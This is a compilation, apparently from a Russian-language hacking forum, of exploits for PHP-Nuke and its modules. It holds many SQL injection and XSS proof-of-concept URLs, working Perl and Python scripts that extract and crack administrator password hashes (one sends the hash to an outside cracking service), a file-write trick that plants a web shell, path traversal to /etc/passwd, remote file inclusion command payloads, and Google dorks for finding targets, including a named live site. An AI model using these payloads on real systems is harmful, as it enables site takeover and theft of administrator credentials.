XSS in PHP-Nuke (eWeather module) XSS Vulnerable: eWeather module Уязвимый код: в скрипте /modules/eWeather/index.php PHP: Строка 35: $zipCode=$chart; Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>"; Переменная "chart" не фильтруется. PoC: Code: http://example.net/modules.php?name=eWeather&chart=[XSS] Fix: Строку 35 заменить на: "$zipCode=(int)$chart;" by: NetJackal
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection SQL Injection Vulnerable: PHP-Nuke Platinum 7.6.b.5 Vuln script: dynamic_titles.php Exploit: Code: #!/usr/bin/perl #Inphex use LWP::UserAgent; use LWP::Simple; use IO::Socket; use Switch; #PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection #nuke_users Structure: #user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting #Description: #The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427 #What about PHP-Nukes' SQL Injection Protection? #I could bypass its SQL Injection protection. #If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off. #You can of course edit the SQL Injection , file write is possible. # #Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php) print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n"; $column = "username"; $table = "nuke_users"; $uid = 2; %cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid"); $a = 0; foreach (@ARGV) { $a++; while (($k, $v) = each(%cm_n_)) { if ($_ eq $k) { ${$v} = $ARGV[$a]; } } } &getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>"); sub getit($$) { $url = shift; $reg = shift; $ua = LWP::UserAgent->new; $urls = $url; $response = $ua->get($urls); $content = $response->content; if ($content=~m/$reg/) { ($f,$s,$l) = split(">>",$1); $s =~s/ Post //; print $column.":".$s."\n"; } } © Inphex
PHP-Nuke version 8.1 CAPTCHA bypass Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy. http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability Code: ------------------------------------------------------------------------------- php-nuke modules EasyContent remote sql inj ------------------------------------------------------------------------------- found =xoron ------------------------------------------------------------------------------- modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/* modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* ------------------------------------------------------------------------------- Example: http://eurowards.org/content/ not: password and username in title! colomb number 1 not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma. işe yarar bug nasıl hit yapıyor görmek istiyorsanız http://www.milw0rm.com/author/721 sadece bi bug 16000+ hit sadece milw0rm;) Herzmn kral benimdir! -------------------------------------------------------------------------------
PHP-Nuke GaestebuchSQL Injection Exploit Code: #!/usr/bin/python # PHP-Nuke Gaestebuch Module SQL Injection Exploit # Coded By Shahin Ramezany For Fun # E-Mail : [email protected] import string import urllib import sys import re def Secuiran(): print "\n" print "#####################################################" print "# WwW.Secuiran.Com #" print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit #" print "# Coded By Shahin . Ramezany (Vampire) For Fun #" print "# Keep It Priv8 && Never Post In Public Forum's #" print "# E-Mail : [email protected] #" print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix #" print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's #" print "#####################################################" print "\n" #Call Banner Secuiran() print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/" try: host=raw_input("\nTarget Host (with http) : ") except KeyboardInterrupt: print "\n[-] Program Terminated" sys.exit() print "\n[+] Output File: e.e: secuiran.txt" try: secuiran=raw_input("\nOutput File: ") except KeyboardInterrupt: print "\n[-] Program Terminated" sys.exit() print "\n[+] Trying To Connect ...\n" #SQL Injection URL sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1" response = urllib.urlopen(sql_inject).read() print "[+] Trying To Inject Code ...\n" #Extract Admin User findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall found_users=findall_users(response) #check found user length if len(found_users)==0: print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " sys.exit() #Extract Admin Hash response = urllib.urlopen(sql_inject).read() findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall found_hashs=findall_hashs(response) if len(found_hashs)==0: print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " sys.exit() #Crack The Hash md5 = string.join( found_hashs, '' ) print "[+] Trying To Crack The Hash ..." crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5 result = urllib.urlopen(crack).read() cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall if re.match(result,"MD5_1_result,"+md5+" - not found"): print "[-] Can Not Crack" #sys.exit() found=cracked(result) #Convert List To String cracked_md5 = string.join( found, '' ) #Print All Info Secuiran() print "\n[+] Host : ",host for i in range(len(found_users)): print "\n[+] Admin User : ",found_users[i] print "\n[+] Admin Hash : ",found_hashs[i] if (cracked_md5 == "not"): print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!" else: print "\n[+] Hash Cracked Successfully : ",cracked_md5 #Save All Info In File file = open(secuiran, "w") file.write("**************************************************WwW.Secuiran.Com**************************************************\n") file.write("\n") file.write("HOST :") file.write(" ") file.write(host) file.write("\n") file.write("\n") file.write("USER HASH\n") file.write(" ") file.write("\n") for i in range(len(found_users)): file.write(found_users[i]) file.write(" ") file.write(found_hashs[i]) file.write("\n") file.write("\n") if (cracked_md5 == "not"): file.write("\n") file.write("I Can't Crack Your Hash") else: file.write("Cracked :") file.write(" ") file.write("\n") file.write(cracked_md5) file.write("\n") file.write("**************************************************WwW.Secuiran.Com**************************************************\n") file.close() print "\n[+] Successfully, Writed To ",secuiran," File ."
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab Code: #!/usr/bin/python #=============================================================================== ==================# # This is a Priv8 Exploit. # # Date: 23/02/2008 [dd,mm,yyyy] # # # #=============================================================================== ==================# # PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 # # Response Analisys Method # # # # Vendor: http://www.phpnuke.org # # Severity: Highest # # Author: The:Paradox # #=============================================================================== ==================# # Server configuration requirments: # # magic_quotes_gpc = 0 # #=============================================================================== ==================# # Proud To Be Italian. # #=============================================================================== ==================# """ Related Codes: mainfile.php; line 89; if (!ini_get('register_globals')) { @import_request_variables("GPC", ""); } /Your_Account/index.php; line 1700; switch($op) { // [..] case "activate": activate($username, $check_num); break; // [..] } /Your_Account/index.php; line 161: function activate($username, $check_num) { global $db, $user_prefix, $module_name, $language, $prefix; $username = filter($username, "nohtml", 1); $past = time()-86400; $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past"); $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'"; echo $sql; $result = $db->sql_query($sql); """ #=============================================================================== ==================# # Proof Of Concept / Bug Explanation: # # # # I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable. # # Byte null bypasses all query string check. # # # #=============================================================================== ==================# # Google Dork=> Powered by PHPNuke # #=============================================================================== ==================# # Use this at your own risk. You are responsible for your own deeds. # #=============================================================================== ==================# # Python Exploit Starts # #=============================================================================== ==================# import httplib, sys, time print "\n#=========================================================#" print " PHPNuke <= 8.0 And Maybe Higher " print " Blind Sql Injection Vulnerability Mq=0 " print " Response Analisys Method " print " " print " Discovered By The:Paradox " print " " print " Usage: " print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0]) print " " print " Example: " print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0]) print " python %s www.host.com / Andrea " % (sys.argv[0]) print " " print " " print "#=========================================================#\n" if len(sys.argv)<=3: sys.exit() else: print "[.]Exploit Starting." target = sys.argv[1] path = sys.argv[2] prefix = "nuke_" port = "80" j=1 h4sh = "" md5tuple = [] for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102 for k in range(97,103): md5tuple.append(k) md5tuple.append('END') # Result query >>> # # SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1' # print "[.]Blind Sql Injection Starts.\n\nHash:" while j <= 32: for i in md5tuple: if i == 'END': sys.exit('[-]Exploit Failed.\n') conn = httplib.HTTPConnection(target,port) conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"}) response = conn.getresponse() time.sleep(0.5) if response.status == 404: sys.exit('[-]Error 404. Not Found.') if response.read().find("New user verification number is invalid.") != -1: sys.stdout.write(chr(i)) sys.stdout.flush() h4sh += chr(i) j += 1 break; print "\n\n[+]All Done.\n-=Paradoxe=-"
Ковырял я когда то PHP Nuke 8.0. Вот парачка багов: [XSS] http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00"><script>alert()</script> [XSS] http://nuke/modules.php?name=Your_Account&op=logout POST: redirect=1%00"><script>alert()</script> [SQL-Inj] (POC) http://nuke/admin.php POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
Уязвимая версия myPHPNuke 1.8.8_8rc2 Уязвимость xss в site.ru/memberslist.php в параметрах search, letter, sortcol, sortdir, pagesize. тут все на украинском я мало что понял о регенат тут
XSS: POST-запрос на странице http://site/modules.php?name=Your_Account &op=new_user Code: "><script src=http://site/script.js> В полях: gfx_check та random_num.
Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код Exploit: Для примера возьму сайт sat-port.info Регистрируемся, редактируем наш аккаунт: Code: http://sat-port.info/modules.php?name=Your_Account&op=edituser в поле Любой Email пишем: Code: [email protected]',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/* Берем любую новость где разрешено оставлять комментарии, к примеру эту: Code: http://sat-port.info/modules.php?name=News&file=article&sid=554 жмем "Комментировать" и пишем комментарий любого содержания, в результате появиться комментарий содержащий логин:хэш администратора
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability Code: ############################################################ SQL Injection vulnerability in myPHPNuke By MustLive (http://websecurity.com.ua) Detailed information: http://websecurity.com.ua/2398/ Description: There is SQL Injection vulnerability in printfeature.php in myPHPNuke. SQL Injection: http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1 With this query you will receive login and password (hash) of administrator. Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to this attack. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets). ############################################################ # milw0rm.com [2008-09-02] Содрано с milw0rm.com/exploits/6347
изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0 Code: modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors и еще Code: modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors-- modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+nuke_authors--
SQL-Injection PHP-Nuke <= 8.0 SQL-Injection In PHP-Nuke <= 8.0(Module Reviews) /modules/Reviews/index.php Фрагмент уязвимого кода: PHP: $uname = filter($cookie[1], "nohtml"); $id = intval($id); $score = intval($score); if (is_user($user)) { $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'")); if ($krow['karma'] == 2) { $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')"); include("header.php"); title(""._MODERATEDTITLE.""); OpenTable(); echo "<center>"._COMMENTMODERATED.""; echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>"; CloseTable(); include("footer.php"); die(); } elseif ($krow['karma'] == 3) { Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id"); die(); } } $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')"); Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter PHP: function filter($what, $strip="", $save="", $type="") { if ($strip == "nohtml") { $what = check_html($what, $strip); // $what = htmlentities(trim($what), ENT_QUOTES); // If the variable $what doesn't comes from a preview screen should be converted if ($type != "preview" AND $save != 1) { $what = html_entity_decode($what, ENT_QUOTES); } } if ($save == 1) { $what = check_words($what); $what = check_html($what, $strip); if (!get_magic_quotes_gpc()) { $what = addslashes($what); } } else { $what = stripslashes(FixQuotes($what,$strip)); $what = check_words($what); $what = check_html($what, $strip); } return($what); } а оттуда в ф-цию check_html PHP: function check_html ($str, $strip="") { /* The core of this code has been lifted from phpslash */ /* which is licenced under the GPL. */ include("config.php"); if ($strip == "nohtml") $AllowableHTML=array(''); $str = stripslashes($str); $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str); // Delete all spaces from html tags . $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str); // Delete all attribs from Anchor, except an href, double quoted. $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str); // Delete all img tags $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str); // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com $tmp = ""; while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) { $i = strpos($str,$reg[0]); $l = strlen($reg[0]); if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1)); else $tag = strtolower($reg[1]); if ($a = $AllowableHTML[$tag]) if ($reg[1][0] == "/") $tag = "</$tag>"; elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>"; else { # Place here the double quote fix function. $attrb_list=delQuotes($reg[2]); // A VER //$attrb_list = ereg_replace("&","&",$attrb_list); $tag = "<$tag" . $attrb_list . ">"; } # Attribs in tag allowed else $tag = ""; $tmp .= substr($str,0,$i) . $tag; $str = substr($str,$i+$l); } $str = $tmp . $str; return $str; exit; /* Squash PHP tags unconditionally */ $str = ereg_replace("<\?","",$str); return $str; } где экранирующие бэкслэши успешно удаляются, поэтому становится возможным внедрить наш sql код, через скулю в select данные вывести не получится, поэтому юзаем скулю в insert Идем в /modules.php?name=Reviews&rop=showcontent&id=1 выбираем любую рецензию, жмем "Поместить комментарий" в куки кидаем Code: base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096) Жмем submit, в результате мы получим login:hash админа Зато через скулю в select при file_priv можно залить шелл, кидаем в куки: Code: base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096) Тут путь можно не раскрывать, лить в tmp, а затем просто проинклудить залитый шелл через templetes, для этого идем в /modules.php?name=Your_Account&op=chgtheme правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем: Code: <option value="/../../../../../../../tmp/" >RusNuke2003 сохраняем, получаем шелл
Уязвимости модулей PHP-NUKE Уязвимый продукт: PHP-NUKE module Pages Версия: 1.0 Дорк: Pages © inurl:/modules.php?name=Pages SQL-injections Уязвимость в файле: index.php В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры Code: /modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23 /modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11,12+from+nuke_authors%23 /modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_authors%23 /modules.php?name=Pages&cid=11'%0aunion+select+1%23 /modules.php?name=Pages&pid=11'%0aunion+select%201,2%23
Уязвимый продукт: PHP-NUKE module video stream Версия: 4.53 Дорк: inurl:name=Video_Stream SQL-injections Уязвимость в файле: watch.php PHP: $id = $_GET['id']; $request = $_GET['request']; if($id == "request") { // Gets the data of request video **FOR ADMIN** $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'"); $row = $db->sql_fetchrow($result); } else { // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered adultcategory($id); // Add user point for veiwing video userpointsVS(1); // adds a view to the video $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'"); $row = $db->sql_fetchrow($result); $v = $row['views']; $v++; $result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'"); // Gets the data of that video $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'"); $row = $db->sql_fetchrow($result); } Как видим здесь присутствуют сразу несколько sql-inj Примеры запросов: Code: /modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23 /modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23 Уязвимость в файле: broken.php PHP: if($_POST['Submit']) { OpenTable(); $usernameb = $_POST['username']; $user_emailb = $_POST['user_email']; $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') "); Пример запроса: Code: POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3 Content-Type: application/x-www-form-urlencoded Content-Length: 90 username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1),1)/*&user_email=ad%40a.ru&Submit=Submit Уязвимость в файле: search.php В этом модуле присуствуют сразу несколько sql-inj Примеры запросов: 1. /phpnuke/modules.php?name=Video_Stream&page=search в поле search: Code: 44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/* 2. Code: POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search Content-Type: application/x-www-form-urlencoded Content-Length: 138 PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort Уязвимость в файле: comment.php PHP: $commenttopost = $_POST['comment']; // Check if no comment if($commenttopost == "") { die(""._NOCOMMENTENT.""); } $date = date("h:i A dS M Y"); $username = $looker; // Strips out HTML and Censored Words filter_text($commenttopost, 'nohtml'); // ********************************** userpointsVS(2); $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') "); в куки кидаем: Code: id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/* В результате получим комментарий содержащий aid:hash администратора
Уязвимый продукт: PHP-NUKE module auktion Версия: 2.0 Дорк: inurl:modules.php?name=auktion SQL-injections В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах Примеры запросов: Code: /modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21 /modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23 /modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/* /modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 Code: POST /modules.php?name=auktion&file=edititem HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3 Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1YTMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D; Content-Type: application/x-www-form-urlencoded Content-Length: 105 name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*
Уязвимый продукт: PHP-NUKE module NukeJokes Версия: 2.2 Дорк: inurl:modules.php?name=NukeJokes SQL-injections Уязвимость в файле: index.php PHP: function CatView($cat, $page){ ... $result = sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'", $dbi); Данные из параметра cat попадают в запрос без каких либо преобразований Пример запроса: Code: /modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23 PHP: function JokeView($jokeid){ ... $result = sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'", $dbi); Данные из параметра jokeid попадают в запрос без каких либо преобразований Пример запроса: Code: /modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23 Уязвимость в файле: send.php PHP: function send($jokeid, $sendername, $senderemail, $toname, $toemail){ global $sitename, $nukeurl, $prefix, $dbi, $module_name, $stop; include("header.php"); include("config.php"); checkemail($toemail); if (!$stop) { $result = sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'", $dbi); list($name) = sql_fetch_row($result, $dbi); $subject = ""._SUBJECT." $sitename"; $message = ""._HELLO." $toname:\n\n"._YOURFRIEND." $sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD." $sitename\n$nukeurl"; $toemail = str_replace(" ","",$toemail); mail($toemail, $subject, $message, "From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" . phpversion()); Уязвимость в параметре jokeid, т.к данные из столбца name отправляются на email, при таком запросе: Code: POST /modules.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608 Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 181 name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru Мы получим aid:hash администратора на указаное нами мыло Уязвимость в файле: search.php PHP: function search($q, $cat){ global $module_name, $prefix, $bgcolor1, $bgcolor2, $dbi, $prefix; include("header.php"); if($cat==0){ $cats = " "; }else{ $cats = " cat=".$cat." AND "; } ModuleSearch(); ... $search = sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')", $dbi); Уязвимость в параметрах cat и q Пример запроса: Code: /modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23 Уязвимость в файле: comments.php PHP: function JokesAddCom($jokeid, $author, $comment){ global $prefix, $dbi, $bgcolor1, $module_name, $bgcolor2; $author = FixQuotes(nl2br(filter_text($author))); $comment = FixQuotes(nl2br(filter_text($comment))); sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')", $dbi); в ф-ции, filter_text удаляются хтмл тэги, затем данные попадают в ф-цию FixQuotes PHP: function FixQuotes ($what = "") { while (stristr($what, "\\\\'")) { $what = str_replace("\\\\'","'",$what); } return $what; } Для чего здесь была использована эта ф-ция непонятно, при magic_quotes_gpc=off мы без труда можем внедрить наш sql код, для этого выбираем любую шутку, жмем добавить комментарий, в куки кидаем: Code: author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/* в результате получим aid:hash админа
В модулях: Code: http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors http://www.strona.pl/modules.php?name=Search&file=../../../../../../ ../../../etc/passwd%008 Code: http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd Code: http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjox Code: http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20-- Code: http://site/modules.php?name=Reviews&rop=savecomment&id=1& amp;uname=f00bar&score=999999999999999999999999 Code: http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20-- Code: http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* В галерии: Code: http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd Code: http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd Code: http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd Code: http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd Code: http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd Code: http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd Code: http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd Code: http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id
